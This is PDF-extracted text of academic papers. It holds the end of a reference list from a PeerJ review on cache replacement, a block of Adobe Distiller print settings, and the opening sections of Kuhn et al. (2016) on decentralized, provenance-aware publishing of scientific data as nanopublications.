al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 50/51 https://named-data.net/techreport/TR001ndn-proj.pdf https://named-data.net/techreport/TR001ndn-proj.pdf http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Zhou Y, Cui L, Jiang Y, Xu M. 2013. Modeling and optimizing the cache deployment with filter effect in multi-cache system. In: 2013 IEEE Symposium on Computers and Communications (ISCC). Piscataway: IEEE, 561–566. Zhou Y, Philbin J, Li K. 2001. The multi-queue replacement algorithm for second level buffer caches. In: USENIX Annual Technical Conference, General Track. 91–104. Zhou Y, Yu FR, Chen J, Kuo Y. 2017. Resource allocation for information-centric virtualized heterogeneous networks with in-network caching and mobile edge computing IEEE Transactions on Vehicular Technology 66(12):11339–11351. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 51/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Contextual dimensions for cache replacement schemes in information-centric networks: a systematic review Introduction Background Systematic literature review methodology Results and analysis Applications Research directions Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_tww7cprsyzdg5fsft2jhn6hweq ---- Submitted 18 February 2016 Accepted 22 July 2016 Published 22 August 2016 Corresponding author Tobias Kuhn, kuhntobias@gmail.com Academic editor Luc Moreau Additional Information and Declarations can be found on page 25 DOI 10.7717/peerj-cs.78 Copyright 2016 Kuhn et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Decentralized provenance-aware publishing with nanopublications Tobias Kuhn1, Christine Chichester2, Michael Krauthammer3,4, Núria Queralt-Rosinach5, Ruben Verborgh6, George Giannakopoulos7,8, Axel-Cyrille Ngonga Ngomo9, Raffaele Viglianti10 and Michel Dumontier11 1 Department of Computer Science, VU University Amsterdam, Amsterdam, Netherlands 2 Nestle Institute of Health Sciences, Lausanne, Switzerland 3 Yale University School of Medicine, Yale University, New Haven, CT, United States 4 Yale Program in Computational Biology and Bioinformatics, Yale University, New Haven, CT, United States 5 Research Programme on Biomedical Informatics, Hospital del Mar Medical Research Institute, Universitat Pompeu Fabra, Barcelona, Spain 6 Data Science Lab, Ghent University, Ghent, Belgium 7 Institute of Informatics and Telecommunications, NCSR Demokritos, Athens, Greece 8 SciFY Private Not-for-profit Company, Athens, Greece 9 AKSW Research Group, University of Leipzig, Leipzig, Germany 10 Maryland Institute for Technology in the Humanities, University of Maryland, College Park, MD, United States 11 Stanford Center for Biomedical Informatics Research, Stanford University, Stanford, CA, United States ABSTRACT Publication and archival of scientific results is still commonly considered the respons- ability of classical publishing companies. Classical forms of publishing, however, which center around printed narrative articles, no longer seem well-suited in the digital age. In particular, there exist currently no efficient, reliable, and agreed-upon methods for publishing scientific datasets, which have become increasingly important for science. In this article, we propose to design scientific data publishing as a web-based bottom-up process, without top-down control of central authorities such as publishing companies. Based on a novel combination of existing concepts and technologies, we present a server network to decentrally store and archive data in the form of nanopublications, an RDF-based format to represent scientific data. We show how this approach allows researchers to publish, retrieve, verify, and recombine datasets of nanopublications in a reliable and trustworthy manner, and we argue that this architecture could be used as a low-level data publication layer to serve the Semantic Web in general. Our evaluation of the current network shows that this system is efficient and reliable. Subjects Bioinformatics, Computer Networks and Communications, Digital Libraries, World Wide Web and Web Science Keywords Data publishing, Nanopublications, Provenance, Linked Data, Semantic Web INTRODUCTION Modern science increasingly depends on datasets, which are however left out in the classical way of publishing, i.e., through narrative (printed or online) articles in journals or conference proceedings. This means that the publications describing scientific findings become disconnected from the data they are based on, which can seriously impair the How to cite this article Kuhn et al. (2016), Decentralized provenance-aware publishing with nanopublications. PeerJ Comput. Sci. 2:e78; DOI 10.7717/peerj-cs.78 https://peerj.com mailto:kuhntobias@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.78 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.78 verifiability and reproducibility of their results. Addressing this issue raises a number of practical problems: How should one publish scientific datasets and how can one refer to them in the respective scientific publications? How can we be sure that the data will remain available in the future and how can we be sure that data we find on the web have not been corrupted or tampered with? Moreover, how can we refer to specific entries or subsets from large datasets, for instance, to support a specific argument or hypothesis? To address some of these problems, a number of scientific data repositories have appeared, such as Figshare and Dryad (http://figshare.com, http://datadryad.org). Furthermore, Digital Object Identifiers (DOI) have been advocated to be used not only for articles but also for scientific data (Paskin, 2005). While these approaches certainly improve the situation of scientific data, in particular when combined with Semantic Web techniques, they have nevertheless a number of drawbacks: they have centralized architectures, they give us no possibility to check whether the data have been (deliberately or accidentally) modified, and they do not support access or referencing on a more granular level than entire datasets (such as individual data entries). We argue that the centralized nature of existing data repositories is inconsistent with the decentralized manner in which science is typically performed, and that it has serious consequences with respect to reliability and trust. The organizations running these platforms might at some point go bankrupt, be acquired by investors who do not feel committed to the principles of science, or for other reasons become unable to keep their websites up and running. Even though the open licenses enforced by these data repositories will probably ensure that the datasets remain available at different places, there exist no standardized (i.e., automatable) procedures to find these alternative locations and to decide whether they are trustworthy or not. Even if we put aside these worst-case scenarios, websites have typically not a perfect uptime and might be down for a few minutes or even hours every once in a while. This is certainly acceptable for most use cases involving a human user accessing data from these websites, but it can quickly become a problem in the case of automated access embedded in a larger service. Furthermore, it is possible that somebody gains access to the repository’s database and silently modifies part of the data, or that the data get corrupted during the transfer from the server to the client. We can therefore never perfectly trust any data we get, which significantly complicates the work of scientists and impedes the potential of fully automatic analyses. Lastly, existing forms of data publishing have for the most part only one level at which data is addressed and accessed: the level of entire datasets (sometimes split into a small number of tables). It is in these cases not possible to refer to individual data entries or subsets in a way that is standardized and retains the relevant metadata and provenance information. To illustrate this problem, let us assume that we conduct an analysis using, say, 1,000 individual data entries from each of three very large datasets (containing, say, millions of data entries each). How can we now refer to exactly these 3,000 entries to justify whatever conclusion we draw from them? The best thing we can currently do is to republish these 3,000 data entries as a new dataset and to refer to the large datasets as their origin. Apart from the practical disadvantages of being forced to republish data just to refer to subsets of larger datasets, other scientists need to either (blindly) trust us or go through the tedious process of semi-automatically verifying that each of these entries Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 2/29 https://peerj.com http://figshare.com http://datadryad.org http://dx.doi.org/10.7717/peerj-cs.78 indeed appears in one of the large datasets. Instead of republishing the data, we could also try to describe the used subsets, e.g., in the form of SPARQL queries in the case of RDF data, but this doesn’t make it less tedious, keeping in mind that older versions of datasets are typically not provided by public APIs such as SPARQL endpoints. Below, we present an approach to tackle these problems, which builds upon existing Semantic Web technologies, in particular RDF and nanopublications, adheres to accepted web principles, such as decentralization and REST APIs, and supports the FAIR guiding principles of making scientific data Findable, Accessible, Interoperable, and Reusable (Wilkinson et al., 2016). Specifically, our research question is: Can we create a decentralized, reliable, and trustworthy system for publishing, retrieving, and archiving Linked Data in the form of sets of nanopublications based on existing web standards and infrastructure? It is important to note here that the word trustworthy has a broad meaning and there are different kinds of trust involved when it comes to retrieving and using datasets from some third party. When exploring existing datasets, a certain kind of trust is needed to decide whether an encountered dataset is appropriate for the given purpose. A different kind of trust is needed to decide whether an obtained file correctly represents a specific version of a specific dataset that has been chosen to be used. Only the second kind of trust can be achieved with a technical solution alone, and we use the word trustworthy in this paper in this narrow technical sense covering the second kind of trust. This article is an extended and revised version of a previous conference paper (Kuhn et al., 2015). These extensions include, most importantly, a new evaluation on the retrieval of nanopublication datasets over an unreliable connection, a description of the new feature of surface patterns, the specific protocol applied by existing servers, a server network that is now three times as large as before (15 instead of five server instances), a much more detailed walk-through example, and five new figures. We furthermore present more details and discussions on topics including applications in the humanities, traversal-based querying, underspecified assertions, caching between architectural layers, and access of the server network via a web interface. BACKGROUND Nanopublications (Groth, Gibson & Velterop, 2010) are a relatively recent proposal for improving the efficiency of finding, connecting, and curating scientific findings in a manner that takes attribution, quality levels, and provenance into account. While narrative articles would still have their place in the academic landscape, small formal data snippets in the form of nanopublications should take their central position in scholarly communication (Mons et al., 2011). Most importantly, nanopublications can be automatically interpreted and aggregated and they allow for fine-grained citation metrics on the level of individual claims. A nanopublication is defined as a small data container consisting of three parts: an assertion part containing the main content in the form of an atomic piece of formally represented data (e.g., an observed effect of a drug on a disease); a provenance part that describes how this piece of data came about (e.g., how it was measured); and a publication info part that gives meta-information about the nanopublication as a whole Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 3/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 (e.g., when it was created). The representation of a nanopublication with its three parts is based on the RDF language with named graphs (Carroll et al., 2005). In other words, the nanopublication approach boils down to the ideas of subdividing scientific results into atomic assertions, representing these assertions in RDF, attaching provenance information in RDF on the level of individual assertions, and treating each of these tiny entities as an individual publication. Nanopublications have been applied to a number of domains, so far mostly from the life sciences including pharmacology (Williams et al., 2012; Banda et al., 2015), genomics (Patrinos et al., 2012), and proteomics (Chichester et al., 2015). An increasing number of datasets formatted as nanopublications are openly available, including neXtProt (Chichester et al., 2014) and DisGeNET (Queralt-Rosinach et al., 2015), and the nanopublication concept has been combined with and integrated into existing frameworks for data discovery and integration, such as CKAN (McCusker et al., 2013). Interestingly, the concept of nanopublications has also been taken up in the humanities, namely in philosophy (http://emto-nanopub.referata.com/wiki/EMTO_Nanopub), musi- cology (Freedman, 2014), and history/archaeology (Golden & Shaw, 2016). A humanities dataset of facts is arguably more interpretive than a scientific dataset; relying, as it does, on the scholarly interpretation of primary sources. Because of this condition, ‘‘facts’’ in human- ities datasets (such as prosopographies) have often been called ‘‘factoids’’ (Bradley, 2005), as they have to account for a degree of uncertainty. Nanopublications, with their support for granular context and provenance descriptions, offer a novel paradigm for publishing such factoids, by providing methods for representing metadata about responsibilities and by enabling discussions and revisions beyond any single humanities project. Research Objects are an approach related to nanopublications, aiming to establish ‘‘self-contained units of knowledge’’ (Belhajjame et al., 2012), and they constitute in a sense the antipode approach to nanopublications. We could call them mega-publications, as they contain much more than a typical narrative publication, namely resources like input and output data, workflow definitions, log files, and presentation slides. We demonstrate in this paper, however, that bundling all resources of scientific studies in large packages is not a necessity to ensure the availability of the involved resources and their robust interlinking, but we can achieve that also with cryptographic identifiers and a decentralized architecture. SPARQL is an important and popular technology to access and publish Linked Data, and it is both a language to query RDF datasets (Harris & Seaborne, 2013) and a protocol to execute such queries on a remote server over HTTP (Feigenbaum et al., 2013). Servers that provide the SPARQL protocol, referred to as ‘‘SPARQL endpoints,’’ are a technique for making Linked Data available on the web in a flexible manner. While off-the-shelf triple stores can nowadays handle billions of triples or more, they potentially require a significant amount of resources in the form of memory and processor time to execute queries, at least if the full expressive power of the SPARQL language is supported. A recent study found that more than half of the publicly accessible SPARQL endpoints are available less than 95% of the time (Buil-Aranda et al., 2013), posing a major problem to services depending on them, in particular to those that depend on several endpoints at the same time. To understand the consequences, imagine one has to program a mildly time-critical service that depends on RDF data from, say, ten different SPARQL endpoints. Assuming that each Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 4/29 https://peerj.com http://emto-nanopub.referata.com/wiki/EMTO_Nanopub http://dx.doi.org/10.7717/peerj-cs.78 endpoint is available 95% of the time and their availabilities are independent from each other, this means at least one of them will be down during close to five months per year. The reasons for this problem are quite clear: SPARQL endpoints provide a very powerful query interface that causes heavy load in terms of memory and computing power on the side of the server. Clients can request answers to very specific and complex queries they can freely define, all without paying a cent for the service. This contrasts with almost all other HTTP interfaces, in which the server imposes (in comparison to SPARQL) a highly limited interface, where the computational costs per request are minimal. To solve these and other problems, more light-weight interfaces were suggested, such as the read-write Linked Data Platform interface (Speicher, Arwe & Malhotra, 2015), the Triple Pattern Fragments interface (Verborgh et al., 2014), as well as infrastructures to implement them, such as CumulusRDF (Ladwig & Harth, 2011). These interfaces deliberately allow less expressive requests, such that the maximal cost of each individual request can be bounded more strongly. More complex queries then need to be evaluated by clients, which decompose them in simpler subqueries that the interface supports (Verborgh et al., 2014). While this constitutes a scalability improvement (at the cost of, for instance, slower queries), it does not necessarily lead to perfect uptimes, as servers can be down for other reasons than excessive workload. We propose here to go one step further by relying on a decentralized network and by supporting only identifier-based lookup of nanopublications. Such limited interfaces normally have the drawback that traversal-based querying does not allow for the efficient and complete evaluation of certain types of queries (Hartig, 2013), but this is not a problem with the multi-layer architecture we propose below, because querying is only performed at a higher level where these limitations do not apply. A well-known solution to the problem of individual servers being unreliable is the application of a decentralized architecture where the data is replicated on multiple servers. A number of such approaches related to data sharing have been proposed; for example, in the form of distributed file systems based on cryptographic methods for data that are public (Fu, Kaashoek & Mazières, 2002) or private (Clarke et al., 2001). In contrast to the design principles of the Semantic Web, these approaches implement their own internet protocols and follow the hierarchical organization of file systems. Other approaches build upon the existing BitTorrent protocol and apply it to data publishing (Markman & Zavras, 2014; Cohen & Lo, 2014), and there is interesting work on repurposing the proof-of-work tasks of Bitcoin for data preservation (Miller et al., 2014). There exist furthermore a number of approaches to applying peer-to-peer networks for RDF data (Filali et al., 2011), but they do not allow for the kind of permanent and provenance-aware publishing that we propose below. Moreover, only for the centralized and closed-world setting of database systems, approaches exist that allow for robust and granular references to subsets of dynamic datasets (Proell & Rauber, 2014). The approach that we present below is based on previous work, in which we proposed trusty URIs to make nanopublications and their entire reference trees verifiable and immutable by the use of cryptographic hash values (Kuhn & Dumontier, 2014; Kuhn & Dumontier, 2015). This is an example of such a trusty URI: http://example.org/r1.RA5AbXdpz5DcaYXCh9l3eI9ruBosiL5XDU3rxBbBaUO70 Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 5/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 The last 45 characters of this URI (i.e., everything after ‘‘ .’’) is what we call the artifact code. It contains a hash value that is calculated on the RDF content it represents, such as the RDF graphs of a nanopublication. Because this hash is part of the URI, any link to such an artifact comes with the possibility to verify its content, including other trusty URI links it might contain. In this way, the range of verifiability extends to the entire reference tree. Generating these trusty URIs does not come for free, in particular because the normalization of the content involves the sorting of the contained RDF statements. For small files such as nanopublications, however, the overhead is minimal, consisting only of about 1 millisecond per created nanopublication when the Java library is used (Kuhn & Dumontier, 2014; Kuhn & Dumontier, 2015). Furthermore, we argued in previous work that the assertion of a nanopublication need not be fully formalized, but we can allow for informal or underspecified assertions (Kuhn et al., 2013), to deal with the fact that the creation of accurate semantic representations can be too challenging or too time-consuming for many scenarios and types of users. This is particularly the case for domains that lack ontologies and standardized terminologies with sufficient coverage. These structured but informal statements are supposed to provide a middle ground for the situations where fully formal statements are not feasible. We proposed a controlled natural language (Kuhn, 2014) for these informal statements, which we called AIDA (standing for the introduced restriction on English sentences to be atomic, independent, declarative, and absolute), and we had shown before that controlled natural language can also serve in the fully formalized case as a user-friendly syntax for representing scientific facts (Kuhn et al., 2006). We also sketched how ‘‘science bots’’ could autonomously produce and publish nanopublications, and how algorithms could thereby be tightly linked to their generated data (Kuhn, 2015b), which requires the existence of a reliable and trustworthy publishing system, such as the one we present here. APPROACH Our approach on scientific data publishing builds upon the general Linked Data approach of lifting data on the web to linked RDF representations (Berners-Lee, 2006). We only deal here with structured data and assume that is already present in an RDF representation. The question of how to arrive at such a representation from other formats has been addressed by countless approaches—for example Sequeda, Arenas & Miranker (2012) and Han et al. (2008)—and is therefore outside of the scope of this paper. We furthermore exploit the fact that datasets in RDF can be split into small pieces without any effects on their semantics. After Skolemization of blank nodes, RDF triples are independent and can be separated and joined without restrictions. Best practices of how to define meaningful small groups of such triples still have to emerge, but an obvious and simple starting point is grouping them by the resource in subject position. We focus here on the technical questions and leave these practical issues for future research. Specifically, our approach rests upon the existing concept of nanopublications and our previously introduced method of trusty URIs. It is a proposal of a reliable implementation of accepted Semantic Web principles, in particular of what has become known as the Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 6/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 Figure 1 Illustration of current architectures of Semantic Web applications and our proposed approach. follow-your-nose principle: Looking up a URI should return relevant data and links to other URIs, which allows one (i.e., humans as well as machines) to discover things by navigating through this data space (Berners-Lee, 2006). We argue that approaches following this principle can only be reliable and efficient if we have some sort of guarantee that the resolution of any single identifier will succeed within a short time frame in one way or another, and that the processing of the received representation will only take up a small amount of time and resources. This requires that (1) RDF representations are made available on several distributed servers, so the chance that they all happen to be inaccessible at the same time is negligible, and that (2) these representations are reasonably small, so that 